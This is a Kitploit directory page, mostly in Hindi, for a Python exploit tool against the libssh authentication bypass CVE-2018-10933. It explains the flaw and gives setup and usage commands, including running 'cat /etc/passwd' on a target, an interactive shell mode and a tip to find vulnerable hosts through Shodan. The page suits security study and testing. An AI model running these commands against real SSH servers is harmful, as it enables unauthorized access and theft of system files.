Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-10933 — libSSH-Authentication-Bypass | Kitploit
उपकरण/GitHubGitHub/rubikcuv5/cve-2018-10933
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHubrubikcuv5/cve-2018-10933

CVE-2018-10933

libSSH-Authentication-Bypass

रिपॉजिटरी देखें
1234 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-10933


libssh के सर्वर-साइड स्टेट मशीन में संस्करण 0.7.6 और 0.8.4 से पहले एक कमजोरी पाई गई थी। एक दुर्भावनापूर्ण क्लाइंट बिना प्रमाणीकरण किए चैनल बना सकता था, जिसके परिणामस्वरूप अनधिकृत पहुंच हो सकती थी।

कुछ विवरण

समस्या libssh के प्रमाणीकरण के लिए स्थिति बनाए न रखने के तरीके से उत्पन्न होती है और इसका उपयोग प्रमाणीकरण को बायपास करने के लिए कैसे किया जा सकता है। मूल रूप से, कनेक्शन को एक बहु-चरणीय प्रक्रिया के रूप में सोचें: चरण1, चरण2, चरण3... चूंकि libssh चरणों के क्रम को लागू नहीं करता, आप मूल रूप से चरण1 और चरण2 से गुजरे बिना सीधे चरण3 पर जा सकते हैं।

दिलचस्प बात यह है कि यही समस्या पहले SSH लाइब्रेरी Paramiko में पाई गई थी: CVE-2018-7750।

दस्तावेज़ीकरण

Exploit-DB : https://www.exploit-db.com/exploits/45638

libSSH द्वारा CVE-2018-10933 के बारे में जानकारी : https://www.libssh.org/security/advisories/CVE-2018-10933.txt

libSSH द्वारा बगफिक्स रिलीज़ : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/

सेटअप

root@kitploit:~
sudo apt-get install python3

gh repo clone EmmanuelCruzL/CVE-2018-10933

pip3 install -r requirements.txt

python3 main.py

उपयोग

root@kitploit:~
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host

Script for the vulnerabilities CVE-2018-10933

positional arguments:
  host                  the ip or domain address of ssh server

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  The port the service ssh, default [22]
  -log, --logfile       Logfile to write conn logs
  -t, --test            check the version of libSSH
  -c COMMAND, --command COMMAND
                        command to execute
  -i, --interactive     open the interactive mode
   

उदाहरण POC

उदाहरण (जांचें कि होस्ट असुरक्षित है या नहीं)

root@kitploit:~
python3 main.py  0.0.0.0 -port 22  -t

उदाहरण (तर्क के माध्यम से कमांड भेजें)

root@kitploit:~
python3 main.py  0.0.0.0 -p 22  -c "cat /etc/passwd"

उदाहरण (इंटरैक्टिव सरल कंसोल का उपयोग करना)

root@kitploit:~
python3 main.py  0.0.0.0 -p 22  -l

Shodan.io libSSH

root@kitploit:~
[!] can find  devices vulnerables using shodan.io 
-  ( 22 Port is default, other ports like (2222, 3333, 4444) might be including libSSH )

लेखक

  • Rubickcuv
टूल डाउनलोड करें